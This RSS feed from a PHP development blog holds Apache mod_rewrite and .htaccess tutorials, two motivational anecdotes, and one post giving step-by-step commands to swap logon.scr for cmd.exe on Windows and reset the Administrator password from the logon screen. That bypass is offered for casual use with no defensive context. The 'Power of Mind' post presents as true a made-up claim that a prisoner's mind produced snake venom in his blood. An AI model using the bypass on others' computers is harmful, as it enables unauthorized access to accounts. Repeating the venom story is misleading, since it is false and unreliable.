<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Php Development &#187; other</title>
	<atom:link href="http://www.maheshchari.com/category/other/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.maheshchari.com</link>
	<description>Just another WordPress weblog</description>
	<lastBuildDate>Tue, 17 Jan 2012 02:42:48 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1</generator>
		<item>
		<title>How to check weather mod_rewrite module is enabled</title>
		<link>http://www.maheshchari.com/how-to-check-weather-mod_rewrite-module-is-enabled/</link>
		<comments>http://www.maheshchari.com/how-to-check-weather-mod_rewrite-module-is-enabled/#comments</comments>
		<pubDate>Mon, 15 Mar 2010 09:52:49 +0000</pubDate>
		<dc:creator>mahesh chari</dc:creator>
				<category><![CDATA[other]]></category>
		<category><![CDATA[seo]]></category>
		<category><![CDATA[htaccess]]></category>

		<guid isPermaLink="false">http://www.maheshchari.com/?p=440</guid>
		<description><![CDATA[How to check weather mod_rewrite module is enabled or not? We know the impotence of the Search Engine Friendly URLs . To make an application SEF preferable we must have .htaccess permissions and mod_rewrite module enabled. Here we discuss if apache web server mod_rewrite module enabled or not. Step1: Open your note pad and pate [...]]]></description>
			<content:encoded><![CDATA[<h1>How to check weather mod_rewrite module is enabled or not?</h1>
<p>We know the impotence of the Search Engine Friendly URLs . To make an application SEF preferable we must have <a href="http://www.maheshchari.com/enable-htaccess-apache/">.htaccess permissions</a> and <a href="http://www.maheshchari.com/enable-mod_rewrite-on-apache/">mod_rewrite module enabled</a>.</p>
<p>Here we discuss if apache web server mod_rewrite module enabled or not.</p>
<p><b>Step1:</b> Open your note pad and pate below code in it and Save as phpinfo.php.</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">&lt;?php</span> <span style="color: #990000;">phpinfo</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></div></div>

</p>
<p><b>Step2:</b> Now preview this page and find the &#8220;mod_rewrite&#8221; in the column of &#8220;Loaded modules&#8221;.<br />
<a href="http://www.maheshchari.com/wp-content/uploads/2010/03/mod_rewrite.gif"><img src="http://www.maheshchari.com/wp-content/uploads/2010/03/mod_rewrite-300x186.gif" alt="" title="mod_rewrite" width="300" height="186" class="alignlcenter size-medium wp-image-441" /></a></p>
<p><b>Step3:</b> If we found this we enabled mod_rewrite module.</p>
<p><b>Step4:</b>if we didn&#8217;t found ,we can enable it by reading my <a href="http://www.maheshchari.com/enable-mod_rewrite-on-apache/"> previous article</a>.</p>
<img src="http://www.maheshchari.com/?ak_action=api_record_view&id=440&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.maheshchari.com/how-to-check-weather-mod_rewrite-module-is-enabled/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Enable mod_rewrite on apache</title>
		<link>http://www.maheshchari.com/enable-mod_rewrite-on-apache/</link>
		<comments>http://www.maheshchari.com/enable-mod_rewrite-on-apache/#comments</comments>
		<pubDate>Mon, 15 Mar 2010 09:21:09 +0000</pubDate>
		<dc:creator>mahesh chari</dc:creator>
				<category><![CDATA[other]]></category>
		<category><![CDATA[seo]]></category>
		<category><![CDATA[htaccess]]></category>

		<guid isPermaLink="false">http://www.maheshchari.com/?p=438</guid>
		<description><![CDATA[How to enable mode_rewrite module on apache Before enabling this module for SEF URL s ,we must have permission to use .htaccess file .Please read my previous post to enable .htacess. Before beginning this article ,please back up your apache configuration file httpd.conf file located in apache installation. Now open with note pad this configuration [...]]]></description>
			<content:encoded><![CDATA[<h1>How to enable mode_rewrite module on apache</h1>
<p>Before enabling this module for SEF URL s ,we must have permission to use .htaccess file .Please read my <a href="http://www.maheshchari.com/enable-htaccess-apache/" target="_blank">previous post</a> to enable <b>.htacess</b>.</p>
<p>Before beginning this article ,please back up your apache configuration file httpd.conf file located in apache installation.</p>
<p>Now open with note pad this configuration file and find the below the lin</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">#LoadModule rewrite_module modules/mod_rewrite.so</pre></div></div>

<p>Now remove the &#8220;#&#8221; symbol in the above line,results modified looks below</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">LoadModule rewrite_module modules/mod_rewrite.so</pre></div></div>

<p>Now Save the file and restart the apache now mod_rewrite module is enabled.</p>
<img src="http://www.maheshchari.com/?ak_action=api_record_view&id=438&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.maheshchari.com/enable-mod_rewrite-on-apache/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>enable htaccess apache</title>
		<link>http://www.maheshchari.com/enable-htaccess-apache/</link>
		<comments>http://www.maheshchari.com/enable-htaccess-apache/#comments</comments>
		<pubDate>Mon, 15 Mar 2010 08:51:17 +0000</pubDate>
		<dc:creator>mahesh chari</dc:creator>
				<category><![CDATA[other]]></category>
		<category><![CDATA[seo]]></category>
		<category><![CDATA[htaccess]]></category>

		<guid isPermaLink="false">http://www.maheshchari.com/?p=431</guid>
		<description><![CDATA[Enable htacces for directories we know that htaccess permission must on apache web server like making SEF urls, directory permissions..etc.here we discuss about how to check .htaccess enabled. Before we begin this tutorial, please make sure you make a backup copy of the original httpd.conf apache configuration file located in apache installation folder in case [...]]]></description>
			<content:encoded><![CDATA[<h1>Enable htacces for directories</h1>
<p>we know that htaccess permission must on apache web server like making SEF urls, directory permissions..etc.here we discuss about how to check .htaccess enabled.</p>
<p>Before we begin this tutorial, please make sure you make a backup copy of the original <b>httpd.conf</b> apache configuration  file located in apache installation folder  in case we make a mistake, this way we can always go back to the original configuration file </p>
<p>Now open
<p>httpd.conf</p>
<p> file with note pad and find the below text</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">&lt;Directory /&gt;
    Options FollowSymLinks
    AllowOverride none
    Order deny,allow
    Deny from all
    Satisfy all
&lt;/Directory&gt;</pre></div></div>

<p>Then replace <b>AllowOverride none</b> to <b>AllowOverride All</b>. Modified version looks as below</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">&lt;Directory /&gt;
    Options FollowSymLinks
    AllowOverride all
    Order deny,allow
    Deny from all
    Satisfy all
&lt;/Directory&gt;</pre></div></div>

<p>Above change tells the apache to use .htaccess as per directory bases.<br />
Now we can use .htaccess files .</p>
<p><h3>Remember</h3>
<p>Remember while uploading .htaccess file to remote server make sure the file transfer in ASCII mode, generally with windows operating  system FTP programs use binary mode.</p>
<p>Generally FTP programs doesn&#8217;t display the .htaccess files by default ,we must force the FTP program to show hidden files like .htaccess files.</p>
<p>When you save <b>.htaccess</b> file with note pad  it saves as <b>.htaccess.txt</b> .Make sure <b>.htaccess</b> is a file extension not a file name with empty name.</p>
<img src="http://www.maheshchari.com/?ak_action=api_record_view&id=431&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.maheshchari.com/enable-htaccess-apache/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>windows password hack with command promt</title>
		<link>http://www.maheshchari.com/windows-password-hack-with-command-promt/</link>
		<comments>http://www.maheshchari.com/windows-password-hack-with-command-promt/#comments</comments>
		<pubDate>Wed, 17 Feb 2010 06:25:27 +0000</pubDate>
		<dc:creator>mahesh chari</dc:creator>
				<category><![CDATA[other]]></category>

		<guid isPermaLink="false">http://www.maheshchari.com/?p=413</guid>
		<description><![CDATA[A simple command promt windows password hack cmd.exe or command prompt is the command-line interpreter on OS/2, Windows CE and on Windows NT-based operating systems (including Windows 2000, XP, Vista, 7, Server 2003 and Server 2008).At operating system starting a series of commonds and some applications will be invoked by it. logon.scr is the one [...]]]></description>
			<content:encoded><![CDATA[<h1>A simple command promt windows password hack</h1>
<p>cmd.exe or command prompt is the command-line interpreter on OS/2, Windows CE and on Windows NT-based operating systems (including Windows 2000, XP, Vista, 7, Server 2003 and Server 2008).At operating system starting a series of commonds and some applications will be invoked by it. logon.scr is the one of them . so here we take this as advantages.</p>
<p>To perform this hack you need to know how to open command promt and some basic commonds.</p>
<p>To open command promt you have to click on start ,then you see a text box called run at right bottom of the start menu.Then enter cmd commond , a black notepad [:)]will open. now enter the below commands and press enter on your keyboard.</p>
<p>&nbsp;</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">cd..
cd..
cd WINDOWS
cd system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit</pre></td></tr></table></div>

<p>After restart the system,then you will see again commond promt at logon , then follow below steps</p>
<p>first  enter <strong>net user</strong> commond ,it will show all the user account to system , Administrator is the common user account for windows.</p>
<p>after you decide with your newpassword what ever you decide.</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">net user Administrator newpassword</pre></td></tr></table></div>

<p>Now password is changed to newpassword you given.</p>
<p>Again restore the old logon.scr and cmd.exe files to original folder system32 with following commands</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">cd..
cd..
cd WINDOWS
cd system32
del logon.scr
copy temphack\logon.scr logon.scr
copy  temphack\cmd.exe cmd.exe
exit</pre></td></tr></table></div>

<p>After copying original files ,again restart the system and enter with new passowrd have fun.</p>
<p>&nbsp; </p>
<img src="http://www.maheshchari.com/?ak_action=api_record_view&id=413&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.maheshchari.com/windows-password-hack-with-command-promt/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Attitude Is Everything!!!!!</title>
		<link>http://www.maheshchari.com/attitude-is-everything/</link>
		<comments>http://www.maheshchari.com/attitude-is-everything/#comments</comments>
		<pubDate>Sat, 04 Jul 2009 05:12:04 +0000</pubDate>
		<dc:creator>krishnapriya</dc:creator>
				<category><![CDATA[other]]></category>

		<guid isPermaLink="false">http://www.maheshchari.com/?p=231</guid>
		<description><![CDATA[Attitude&#8230;.. An old man lived alone in Minnesota . He wanted to spade his potato garden, but it was very hard work. His only son, who would have helped him, was in prison. The old man wrote a letter to his son and mentioned his situation: Dear Son, I am feeling pretty bad because it [...]]]></description>
			<content:encoded><![CDATA[<h1>Attitude&#8230;..</h1>
<p>An <strong>old man</strong> lived alone in   Minnesota . He wanted to spade his potato garden, but it was very hard work.   His only son, who would have helped him, was in <strong>prison</strong>. The old man wrote a   letter to his son and mentioned his situation:</p>
<p><strong>Dear Son</strong>,<br />
I am feeling pretty bad because it looks like I won&#8217;t be able to plant my   potato garden this year. I hate to miss doing the garden  because your mother always   loved planting time. I&#8217;m just getting too old to be digging up a garden plot.   If you were here, all my troubles  would be over. I know you would dig the   plot for me, if you weren&#8217;t in <strong>prison</strong>.</p>
<p>Love,Dad Shortly, the old man received this <strong>telegram</strong>:</p>
<p>&#8216;<strong>For   Heaven&#8217;s sake, Dad, don&#8217;t dig up the garden!! That&#8217;s where I buried the   GUNS!!</strong>&#8216;,at 4 a.m. the next morning, a dozen <strong>FBI</strong> agents   and local police officers showed up and dug up the entire garden without   finding any guns.</p>
<p>Confused, the old man wrote another note to his   son telling him what had happened, and asked him what to do next.</p>
<p>His son&#8217;s reply was: <strong>Go ahead and plant your   potatoes</strong>, Dad. It&#8217;s the best I could do for you, from here.</p>
<p><strong>NO MATTER WHERE YOU ARE IN THE WORLD, IF   YOU HAVE DECIDED TO DO SOMETHING DEEP FROM YOUR HEART, YOU CAN DO IT. IT IS   THE THOUGHT THAT MATTERS, NOT WHERE YOU ARE OR WHERE THE PERSON IS.</strong></p>
<img src="http://www.maheshchari.com/?ak_action=api_record_view&id=231&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.maheshchari.com/attitude-is-everything/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Power of Mind</title>
		<link>http://www.maheshchari.com/power-of-mind/</link>
		<comments>http://www.maheshchari.com/power-of-mind/#comments</comments>
		<pubDate>Fri, 26 Jun 2009 20:08:53 +0000</pubDate>
		<dc:creator>krishnapriya</dc:creator>
				<category><![CDATA[other]]></category>

		<guid isPermaLink="false">http://www.maheshchari.com/?p=215</guid>
		<description><![CDATA[A true story of power of mind and medication A man was given the punishment of life sentence for his crime. Some scientists went to him and said,&#8221; You will be hanged to death on so and so date, is that true?&#8221; He replied that it was true and that there was no way he [...]]]></description>
			<content:encoded><![CDATA[<h1>A true story of power of mind and medication </h1>
<p> A man was given the  punishment of life sentence for his crime. Some scientists went to him and  said,<strong>&#8221; You will be hanged to death on so and so date, is that true?&#8221;</strong> He replied  that it was true and that there was no way he could be saved. Then the  scientists asked him if he could give his body for experimentation before his  death for the welfare of mankind. That man agreed. The scientists took written  permission to perform this experiment from the court. </p>
<p>   The scientists, the  psychiatrists and the doctors came all equipped the day the man was to be  hanged. They started their experiment. They told the man that anyway he has to  die, so instead of getting hanged he would die of snake bite. They said that  they have to find out how the poison spreads in the body and how a man dies  after snake bite. They convinced him that they wanted to explore about the  remedy to cure man of snake poison.</p>
<p>  They asked the man if  this was <strong>OK </strong>with him. He gave his consent for the whole procedure. The  scientists gave a life demonstration of death of a horse due to snake bite. A  few minutes after the snake bit the horse, it fell down. A few<br />
    seconds  thereafter it trembled and died. The scientists then told the man that this  procedure will be followed for him and this is how his final journey shall  be.  </p>
<p> The man&#8217;s  eyes were covered with a black band and upper half of body was covered with a  veil so that he could not see anything. Now he was notified that in another two  minutes the snake will bite him. They used a rat  instead of snake for the whole procedure, but the man was told that the snake  had bitten him and that he was  about to die. Scientists knew that it was a rat but the criminal assumed that a  snake had bitten him. His mind was convinced that a snake had bitten him, and  therefore he had a strong belief that he would die in the same manner as the  horse. As soon as the snake bit him, the internal power of his mind produced  trembling in his body. The man trembled in the same way as the horse had done  and died. </p>
<p> Scientists  investigated his blood and found snake poison there when actually no snake had  bitten him. He died because he was meditating on the fact that he will die of  snake bite.  </p>
<p>Thus, the mind has  strong influence on the body. This is called Mental Influence. Scientists could  understand that mind influences the body, but they were surprised finding snake  poison in the criminal&#8217;s blood, when actually snake had not bitten him. Where  did it come from? They drew the inference that mind has so much power that it  can even produce poison!  </p>
<p>It is due to the  influence of mind that we start trembling by visualizing a tree to be a thief in  the dark or by assuming a roap to be a snake. But in reality if we assume an  actual snake to be a rope, we pass by keeping our foot over  its head confidently.  The state of mind has  strong influence over your body and your behavior. Therefore, it doesn&#8217;t matter  how many obstacles or how many road blocks hit your way , do not let the  sincerity of mind get lost, because it is the mind which will enable us realize  &amp; attain the victory.</p>
<img src="http://www.maheshchari.com/?ak_action=api_record_view&id=215&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.maheshchari.com/power-of-mind/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

